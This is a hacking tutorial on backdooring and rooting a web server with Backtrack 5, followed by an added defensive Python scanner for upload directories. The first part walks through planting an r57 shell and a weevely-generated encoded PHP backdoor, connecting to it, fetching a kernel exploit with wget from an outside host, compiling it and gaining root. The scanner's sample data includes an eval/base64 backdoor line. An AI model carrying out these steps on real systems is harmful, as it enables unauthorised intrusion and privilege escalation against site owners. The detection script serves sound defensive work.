BackDoor & Rooting With Backtrack 5

Today I'm going to post a tutorial related to backdooring via Backtrack 5.
For this you need a virtual machine with BT5 installed.
OK, now let's start.
Assume our target site: http://target.com/
Now we have hacked the admin panel of the site via SQL injection. The site was SQL-injectable (assumption).

Admin panel: http://target.com/admin/index.php

After logging into the admin panel we have uploaded our shell (r57.php).
Shell location on the server: http://target.com/uploads/r57.php

Now run your VMware >> Backtrack 5...
The game starts now.
Backdooring a server with an encrypted PHP backdoor.. amazing!!


root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/


Where:
-p = your password to access the backdoor
-g = generate a new "encrypted" PHP file (it doesn't actually encrypt the file; it encodes it)
-o = specify your output file


root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p shadow008

+ Backdoor file 'bdoor.php' created with password 'shadow008'.
Now go and check your desktop. There will be an encoded PHP file, bdoor.php.

=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location

Now we have to connect to our encoded bdoor.php:

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://target.com/uploads/bdoor.php -p shadow008

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables.

[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Directory listing successful.


[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!

[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp

Directory pcp Successfully Created.


[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r (or uname -a)

Linux 2.6.32 kernel (assume)

[hacker@target.com/tmp/pcp] wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c

[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory successfully listed.

[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
(compiler output omitted)
done
[hacker@target.com/tmp/pcp] ./hackall
(exploit output omitted)

[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted... Enjoy!!
Which exploit you use depends on the kernel you find; different versions have different exploits. You need to get the exploit, compile it, and execute it.
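From the defender's side, the two stages of this walkthrough each leave a footprint in a web-writable directory: first a server-executable PHP file containing eval/decode primitives lands in /uploads/, then C source and a freshly compiled ELF binary appear under a subdirectory the web server's user can write to. The scanner below is an added example written for this post; it is not code from the original post or from the weevely project. It walks a directory tree and flags files by extension, by ELF magic bytes, and by generic PHP obfuscation/exec indicators (these are broad patterns, not a signature for any one tool). The sample upload directory it builds is constructed inline so the script runs offline; the file names mirror the ones used above purely as labels.

```python
"""Scan a web-writable directory (e.g. an /uploads folder) for dropped PHP
backdoors and for exploit source or compiled binaries.
Added defensive example; not part of the original post or of weevely."""
import os
import re
import tempfile

# Extensions a PHP-enabled web server will execute if a client requests them.
EXECUTABLE_EXT = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
# Source and script extensions that have no business in an upload directory.
SOURCE_EXT = {".c", ".cpp", ".sh", ".pl", ".py"}
# Generic primitives seen in encoded PHP backdoors. One hit is worth a look;
# several together are a strong signal. These are assumptions, not a vendor rule set.
PHP_INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "gzinflate/gzuncompress": re.compile(r"\bgz(inflate|uncompress)\s*\(", re.I),
    "str_rot13": re.compile(r"\bstr_rot13\s*\(", re.I),
    "command execution": re.compile(r"\b(system|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "request-driven input": re.compile(r"\$_(GET|POST|COOKIE|REQUEST|SERVER)\b"),
}
ELF_MAGIC = b"\x7fELF"


def scan_file(path):
    """Return a list of human-readable reasons this file is suspicious (empty if none)."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read(1_000_000)  # inspect at most the first 1 MB
    if data.startswith(ELF_MAGIC):
        reasons.append("ELF binary in web-writable directory")
    if ext in EXECUTABLE_EXT:
        reasons.append("server-executable extension in upload directory")
        text = data.decode("latin-1")  # byte-preserving decode; we only pattern-match
        hits = [name for name, rx in PHP_INDICATORS.items() if rx.search(text)]
        if hits:
            reasons.append("obfuscation/exec indicators: " + ", ".join(hits))
    if ext in SOURCE_EXT:
        reasons.append("source/script file in web-writable directory")
    return reasons


def scan_tree(root):
    """Map each suspicious file (path relative to root) to its list of reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = scan_file(full)
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings


def build_sample_tree():
    """Constructed sample upload directory so the example runs stand-alone.
    Contents are placeholders, not real artefacts."""
    root = tempfile.mkdtemp(prefix="uploads_")
    os.makedirs(os.path.join(root, "tmp", "pcp"))
    samples = {
        "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 16,          # benign image
        "notes.txt": b"plain text attachment\n",                     # benign text
        "bdoor.php": b"<?php eval(base64_decode($_COOKIE['c'])); ?>",  # constructed backdoor pattern
        "tmp/pcp/2.6.32.c": b"#include <stdio.h>\nint main(void){return 0;}\n",  # constructed source
        "tmp/pcp/hackall": ELF_MAGIC + b"\x02\x01\x01" + b"\0" * 9,  # fake ELF header only
    }
    for rel, content in samples.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for path, reasons in sorted(scan_tree(sample_root).items()):
        print(path)
        for reason in reasons:
            print("   -", reason)
```

Point scan_tree at the real upload directory of a PHP application to run it for real; the complementary mitigation is to configure the web server so that nothing under the upload directory is ever executed, which removes the first stage of this walkthrough regardless of what gets uploaded.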
